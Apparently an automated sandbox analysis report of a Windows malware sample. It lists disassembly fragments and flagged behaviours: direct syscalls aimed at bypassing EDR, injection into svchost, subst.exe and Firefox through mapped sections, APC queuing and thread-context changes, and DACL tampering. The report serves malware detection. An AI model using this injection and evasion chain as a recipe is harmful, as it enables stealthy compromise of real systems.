            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]1_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]1_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]1_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFAB40 mov eax, dword ptr fs:[00000030h]1_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD8B42 mov eax, dword ptr fs:[00000030h]1_2_03BD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]1_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]1_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86AA4 mov eax, dword ptr fs:[00000030h]1_2_03B86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68A90 mov edx, dword ptr fs:[00000030h]1_2_03B68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04A80 mov eax, dword ptr fs:[00000030h]1_2_03C04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]1_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]1_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30AD0 mov eax, dword ptr fs:[00000030h]1_2_03B30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]1_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]1_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]1_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]1_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA24 mov eax, dword ptr fs:[00000030h]1_2_03B6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EA2E mov eax, dword ptr fs:[00000030h]1_2_03B5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBCA11 mov eax, dword ptr fs:[00000030h]1_2_03BBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]1_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]1_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDEA60 mov eax, dword ptr fs:[00000030h]1_2_03BDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]1_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]1_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov esi, dword ptr fs:[00000030h]1_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]1_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]1_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]1_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]1_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]1_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]1_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]1_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B649D0 mov eax, dword ptr fs:[00000030h]1_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03BFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC69C0 mov eax, dword ptr fs:[00000030h]1_2_03BC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04940 mov eax, dword ptr fs:[00000030h]1_2_03C04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB892A mov eax, dword ptr fs:[00000030h]1_2_03BB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC892B mov eax, dword ptr fs:[00000030h]1_2_03BC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC912 mov eax, dword ptr fs:[00000030h]1_2_03BBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]1_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]1_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]1_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]1_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]1_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]1_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC97C mov eax, dword ptr fs:[00000030h]1_2_03BBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]1_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]1_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]1_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]1_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E mov edx, dword ptr fs:[00000030h]1_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]1_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0946 mov eax, dword ptr fs:[00000030h]1_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C008C0 mov eax, dword ptr fs:[00000030h]1_2_03C008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC89D mov eax, dword ptr fs:[00000030h]1_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30887 mov eax, dword ptr fs:[00000030h]1_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov ecx, dword ptr fs:[00000030h]1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A830 mov eax, dword ptr fs:[00000030h]1_2_03B6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD483A mov eax, dword ptr fs:[00000030h]1_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD483A mov eax, dword ptr fs:[00000030h]1_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC810 mov eax, dword ptr fs:[00000030h]1_2_03BBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE872 mov eax, dword ptr fs:[00000030h]1_2_03BBE872
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001F81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_001F81F7
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001CA364 SetUnhandledExceptionFilter,0_2_001CA364
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001CA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001CA395

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\subst.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: NULL target: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: NULL target: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\subst.exeThread register set: target process: 7948Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\subst.exeThread APC queued: target process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F79008Jump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001F8C93 LogonUserW,0_2_001F8C93
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001A3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_001A3B4C
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001A4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_001A4A35
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00204EF5 mouse_event,0_2_00204EF5
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\7RsDGpyOQk.exe"Jump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeProcess created: C:\Windows\SysWOW64\subst.exe "C:\Windows\SysWOW64\subst.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\subst.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001F81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_001F81F7
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00204C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00204C03
            Source: 7RsDGpyOQk.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
